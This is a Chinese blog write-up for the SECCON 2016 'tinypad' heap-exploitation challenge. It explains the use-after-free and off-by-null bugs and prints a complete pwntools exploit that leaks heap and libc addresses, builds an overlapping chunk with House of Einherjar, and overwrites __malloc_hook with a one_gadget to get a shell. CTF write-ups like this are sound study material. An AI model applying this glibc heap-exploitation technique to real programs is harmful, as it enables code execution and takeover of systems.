SECCON 2016 tinypad题目

文件:https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/heap/house-of-einherjar/2016_seccon_tinypad

checksec下:

1
2
3
4
5
Arch:     amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)

程序操作

1
2
3
4
5
添加memo:    申请的大小范围:1 - 0x100
删除memo: 存在UAF
编辑memo

使用read_until函数读取memo内容,该函数有off-by-null

程序数据存储:

1
2
3
4
tinypad+256起存储memos
每个memo0x10字节:
8字节:memo长度
8字节:指向memo内容

pwn脚本

思路:通过off-by-null,利用House of Einherjar构造overlapping chunk,再覆盖fast chunk的fd指针,指向__malloc_hook附近,将__malloc_hook覆盖成one_gadget

tinypad_pwn.py:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
# -*-coding:utf-8-*-
from pwn import *
import pdb

# context.log_level = "debug"

def add_memo(p, size, content):
p.recvuntil("(CMD)>>>")
p.sendline("A")
p.recvuntil("(SIZE)>>>")
p.sendline(str(size))
p.recvuntil("(CONTENT)>>>")
p.sendline(content)

def delete_memo(p, idx):
p.recvuntil("(CMD)>>>")
p.sendline("D")
p.recvuntil("(INDEX)>>>")
p.sendline(str(idx))

def edit_memo(p, idx, content):
p.recvuntil("(CMD)>>>")
p.sendline("E")
p.recvuntil("(INDEX)>>>")
p.sendline(str(idx))
p.recvuntil("(CONTENT)>>>")
p.sendline(content)
p.recvuntil("(Y/n)>>>")
p.sendline("Y")


p = process("./tinypad")

# 第一步: 利用UAF泄露heap地址和libc基址
add_memo(p, 0x60, "A" * 0x10) # fast chunk
add_memo(p, 0x60, "B" * 0x10) # fast chunk
add_memo(p, 0xf0, "C" * 0x10) # unsorted chunk
add_memo(p, 0x80, "D" * 0x10)

delete_memo(p, 3)
delete_memo(p, 2)
delete_memo(p, 1)

p.recvuntil("INDEX: 1")
p.recvuntil("CONTENT: ")
addr_heap = u64(p.recvuntil("\n", drop=True).ljust(8, "\x00"))
log.success("addr_heap: " + hex(addr_heap))

p.recvuntil("INDEX: 3")
p.recvuntil("CONTENT: ")
addr_unsorted_bin = u64(p.recvuntil("\n", drop=True).ljust(8, "\x00"))
log.success("addr_unsorted_bin: " + hex(addr_unsorted_bin))
addr_libc = addr_unsorted_bin - 0x3c4b78 # Fix You
log.success("addr_libc: " + hex(addr_libc))
addr_malloc_hook = addr_libc + 0x3C4B10 # Fix You
addr_fake_fastchunk = addr_malloc_hook - 0x23
one_gadget = addr_libc + 0xf1147 # 该one_gadget需满足[rsp+0x70] == NULL # Fix You

# 第二步: 利用House Of Einherjar构造overlapping chunk
add_memo(p, 0xf0, "C" * 0x10) # use unsorted chunk (index: 1)
add_memo(p, 0x60, p64(0) + p64(0xd0) + p64(addr_heap - 0x60) + p64(addr_heap - 0x60)) # fake chunk (index: 2)
add_memo(p, 0x68, "B" * 0x60 + p64(0xd0)) # off-by-one (index: 3, will be overlapping chunk)
'''此时堆从低地址到高地址的分布:
fake chunk -- AAAA ---- (index: 2)
用于执行off-by-one的chunk -- BBBB ---- (index: 3)
用于free的chunk -- CCCC ---- (index: 1)
靠top chunk的chunk -- DDDD ---- (index: 4)
'''

delete_memo(p, 1) # free to consolidate backward
delete_memo(p, 3) # add this overlapping chunk to fastbin

# 第三步: 覆盖fastbin上的chunk的fd指针,指向__malloc_hook附近区域
add_memo(p, 0x90, "E" * 0x50 + p64(0) + p64(0x71) + p64(addr_fake_fastchunk)) # (index: 1)

'''
因为最多只能有4个memo,这里需要删除一个,后面才能申请到两个memo
这里不能调delete_memo(p, 4), 因为要释放调这个靠top chunk的chunk,其会跟top chunk合并,下面的size变量会加上top chunk的大小,从而满足下面的条件
if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
if (have_fastchunks(av))
malloc_consolidate(av);
...
}
就会调用到malloc_consolidate函数。而在这个函数里处理fastbin chunk时会调用到unlink,而unlink时会检查被unlink的chunk的size和prev_size,这个检查通不过。
'''
delete_memo(p, 1)

add_memo(p, 0x60, "F" * 0x10) # (index: 1)
add_memo(p, 0x60, "X" * (addr_malloc_hook - addr_fake_fastchunk - 0x10) + p64(one_gadget)) # (index: 2)


# 第四步: 调用malloc, 触发one_gadget
delete_memo(p, 2)
p.recvuntil("(CMD)>>>")
p.sendline("A")
p.recvuntil("(SIZE)>>>")
p.sendline(str(0x10))


p.interactive()

运行上面的脚本前需根据自己的libc版本来修改几个硬编码值,脚本里用Fix You标注出。
附:这里有个思路是跟上面稍微有些不同


本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!